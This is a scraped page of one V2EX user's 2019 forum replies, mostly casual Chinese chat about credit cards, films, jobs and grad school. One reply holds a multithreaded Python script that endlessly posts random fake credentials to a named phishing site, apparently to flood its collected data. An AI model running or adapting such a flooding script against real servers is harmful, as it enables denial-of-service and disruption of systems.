V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  bankroft  ›  全部回复第 21 页 / 共 26 页
回复总数  517
1 ... 13  14  15  16  17  18  19  20  21  22 ... 26  
2019-04-19 04:40:50 +08:00
回复了 cxbanana 创建的主题 问与答 是否真的需要办信用卡
@hakono 单纯购买国外 vps 这种的,国内有银行提供万事达和 visa 的借记卡😏😏😏
2019-04-15 19:00:57 +08:00
回复了 huihoo 创建的主题 程序员 《神秘的程序员们》
@Dogergo
@chuqi fq 可解决😁😁😁
2019-04-15 18:51:07 +08:00
回复了 tyrealgray 创建的主题 问与答 复联 4 开了这个头,以后看首映是不是都是奢侈行为了
除了万达其他的好像都不贵
2019-03-29 20:06:23 +08:00
回复了 linxu 创建的主题 酷工作 [深圳宝安区] 招聘初、中、高级后台开发 10-40k
招应届吗
2019-03-29 12:41:42 +08:00
回复了 plqws 创建的主题 分享创造 在 V 站众筹一款正在开发的 SSH 客户端: Termix
是 3$/月还是一次就够😌😌😌
2019-03-21 14:38:18 +08:00
回复了 s9d382v 创建的主题 程序员 考研二战凉了,该怎么办?继续再考还是读非全日制呢
当初的专硕和现在的非全都差不多,现在的专硕比学硕还要火,考研人数每年都在涨,个人认为以后得非全认可度可能和全日制差不多。毕竟很多学校非全和全日制学的都一样
2019-02-26 09:43:20 +08:00
回复了 yuanshuai1995 创建的主题 全球工单系统 简书挂了吗
简书 404 页面
2019-02-25 20:03:30 +08:00
回复了 bankroft 创建的主题 问与答 求推荐性价比高一点的显示器
@yhxx 谢谢,我去看看
2019-02-15 18:07:39 +08:00
回复了 Tounea 创建的主题 问与答 诺基亚 N97 自带的导航软件是自研的还是用第三方的?
现在貌似叫 here we go,但是中国 sim 卡不能用
2019-02-06 18:15:12 +08:00
回复了 ififi 创建的主题 分享发现 分享一个英雄联盟的 QQ 钓鱼网页
```python
# coding :utf-8
import requests
from random import randint, choices
from string import ascii_letters



headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
# 'Cookie': '__cfduid=dac60a7c5e3c3bfa126bd285b6598c6cb1549427923; PHPSESSID=7frq0835cir5h5172mdhmpsne3; pgv_pvid=6881914654; pgv_info=pgvReferrer=&ssid=s1459310656; ied_rf=www.vizay.xyz/zhaohuan/index.php',
'DNT': '1',
'Host': 'www.vizay.xyz',
'Origin': 'http://www.vizay.xyz',
'Referer': 'http://www.vizay.xyz/zhaohuan/index.php?act=1',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'
}

url = 'http://www.vizay.xyz/shzz.php'

def main():
while True:
try:
requests.post(url, headers=headers, data={'u': randint(12345, 3000000000), 'p': choices(ascii_letters, k=randint(6, 16)), 'bianhao': 1})
except Exception:
pass


if __name__ == '__main__':
import threading
import time
for _ in range(10):
t = threading.Thread(target=main)
t.setDaemon(True)
t.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
exit(0)
```
@niubikelasi #2 hhh
2019-02-06 12:55:47 +08:00
回复了 guokeke 创建的主题 问与答 亲戚在酒桌上一个劲骂我怎么办?
@guokeke 用你的专业知识疯狂嘲讽"他"
[认真]
1 ... 13  14  15  16  17  18  19  20  21  22 ... 26  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5671 人在线   最高记录 6543   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 31ms · UTC 07:01 · PVG 15:01 · LAX 00:01 · JFK 03:01
Developed with CodeLauncher
♥ Do have faith in what you're doing.